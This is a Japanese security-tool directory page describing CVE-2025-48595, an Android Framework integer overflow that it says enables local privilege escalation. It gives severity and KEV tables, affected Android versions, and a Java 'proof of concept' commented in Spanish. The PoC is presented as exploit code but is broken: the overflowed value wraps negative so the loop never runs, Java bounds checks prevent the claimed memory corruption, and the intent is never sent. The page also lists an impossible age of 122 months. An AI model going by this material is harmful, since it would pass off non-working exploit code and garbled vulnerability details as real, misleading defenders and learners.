Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-48595-Android-Framework-Integer-Overflow- — VE-2025-48595は、Android フレームワークの複数箇所における**整数オーバーフロー(integer overflow)**の脆弱性です。 | Kitploit
ツール/GitHubGitHub/fevar54/cve-2025-48595-android-framework-integer-overflow-
Androidセキュリティ特権昇格脆弱性分析エクスプロイトモバイルセキュリティバイナリエクスプロイト
GitHubfevar54/cve-2025-48595-android-framework-integer-overflow-

CVE-2025-48595-Android-Framework-Integer-Overflow-

VE-2025-48595は、Android フレームワークの複数箇所における**整数オーバーフロー(integer overflow)**の脆弱性です。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
122ヶ月前未レビュー

CVE-2025-48595 - Android Framework 整数オーバーフローの脆弱性

Critical CVE KEV

説明

CVE-2025-48595は、Android Frameworkの複数の場所における整数オーバーフローの脆弱性です。この欠陥により、追加の実行権限を必要とせずに、コードの実行が可能となり、ローカル権限昇格につながります。ユーザーの操作は必要ありません。

重要度ステータス

要素状態
アクティブな悪用✅ 確認済み(限定的で断片的な悪用)
CISA KEVカタログに掲載✅ あり
KEV追加日2026-06-02
有効期限2026-06-05
パッチ提供有無✅ あり

影響を受けるシステム

Android バージョン影響の有無
Android 14✅ あり
Android 15✅ あり
Android 16✅ あり
Android 16 QPR2✅ あり

攻撃ベクトル

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

text

概念実証(POC)

POCの説明

以下のコードは、Android Frameworkで整数オーバーフローを引き起こす悪意のあるデータを送信することで、この脆弱性の悪用を示しています。これにより、昇格した権限で任意のコードが実行可能になります。

root@kitploit:~
// POC - CVE-2025-48595
// Android Framework Integer Overflow Vulnerability
// Uso: Compilar y ejecutar en dispositivo Android vulnerable

package com.example.cve202548595;

import android.app.Activity;
import android.os.Bundle;
import android.util.Log;

public class MainActivity extends Activity {
    
    private static final String TAG = "CVE-2025-48595";
    
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        
        // POC: Desencadenar desbordamiento de entero
        triggerIntegerOverflow();
    }
    
    private void triggerIntegerOverflow() {
        try {
            // Valor que causa el desbordamiento (más allá del límite esperado)
            int maliciousValue = Integer.MAX_VALUE + 1;
            
            // Construir intent malicioso
            android.content.Intent intent = new android.content.Intent();
            intent.putExtra("malicious_data", maliciousValue);
            
            // Forzar operación con desbordamiento
            int result = processMaliciousData(maliciousValue);
            
            Log.i(TAG, "Desbordamiento activado exitosamente");
            
        } catch (Exception e) {
            Log.e(TAG, "Error: " + e.getMessage());
        }
    }
    
    private int processMaliciousData(int value) {
        // El desbordamiento aquí permite la corrupción de memoria
        int[] buffer = new int[1024];
        
        // El valor malicioso excede los límites del buffer
        // debido al desbordamiento de entero
        for (int i = 0; i < value; i++) {
            buffer[i] = i;  // Esta línea causa overflow
        }
        
        return buffer[0];
    }
}
ツールをダウンロード
メトリクス値
攻撃ベクトルLocal (AV:L)
攻撃の複雑さBaja (AC:L)
必要な権限Ninguno (PR:N)
ユーザーの操作Ninguna (UI:N)
機密性への影響Alto (C:H)
完全性への影響Alto (I:H)
可用性への影響Alto (A:H)